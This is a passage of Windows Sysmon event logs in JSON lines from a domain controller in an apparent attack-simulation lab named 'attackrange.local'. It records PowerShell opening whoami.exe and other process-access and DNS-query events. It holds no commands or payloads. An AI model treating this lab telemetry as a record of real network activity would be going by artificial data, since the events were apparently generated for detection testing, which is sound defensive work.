i.dll+6a0563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a0563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a056251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a0481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a054709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a0542fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a054025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a053cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6ab0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a03ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a03a127(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F8C-5F25-0000-0010A6800400}","SourceProcessId":"4492","SourceThreadId":"4604","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010B28C0400}","TargetProcessId":"4608","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6abb2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a054025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a053cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6ab0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a01488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a072d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a0563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a0563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a056251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a0481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a054709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a0542fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a054025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a053cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6ab0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a03ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a03a127(wow64)","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2583,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2584,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010B28C0400}\r\nTargetProcessId: 4608\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010B28C0400}","TargetProcessId":"4608","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2585,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F8C-5F25-0000-00105F7D0400}\r\nSourceProcessId: 4400\r\nSourceThreadId: 4420\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010B28C0400}\r\nTargetProcessId: 4608\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F8C-5F25-0000-00105F7D0400}","SourceProcessId":"4400","SourceThreadId":"4420","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010B28C0400}","TargetProcessId":"4608","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2586,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.240\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: WIN-DC-6178966\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.240","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"WIN-DC-6178966","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2587,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.241\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nProcessId: 2888\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.241","ProcessGuid":"{41C8662E-1F73-5F25-0000-001087BC0200}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2588,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.565\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.565","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2589,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.570\r\nProcessGuid: {41C8662E-1F63-5F25-0000-001044B90000}\r\nProcessId: 1140\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.570","ProcessGuid":"{41C8662E-1F63-5F25-0000-001044B90000}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2590,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.657\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nProcessId: 1312\r\nQueryName: us-east-2.compute.internal\r\nQueryStatus: 9502\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.657","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","QueryName":"us-east-2.compute.internal","QueryStatus":"9502","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2591,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.659\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9502\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.659","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9502","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2592,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.672\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010C2C20000}\r\nProcessId: 1220\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: ::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.672","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010C2C20000}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2593,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.672\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.672","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"attackrange.local.","QueryStatus":"0","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2594,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.672\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nProcessId: 2888\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.672","ProcessGuid":"{41C8662E-1F73-5F25-0000-001087BC0200}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2595,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.672\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nProcessId: 2888\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-6178966.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.672","ProcessGuid":"{41C8662E-1F73-5F25-0000-001087BC0200}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"type:  2 win-dc-6178966.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2596,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.673\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nProcessId: 2888\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.673","ProcessGuid":"{41C8662E-1F73-5F25-0000-001087BC0200}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
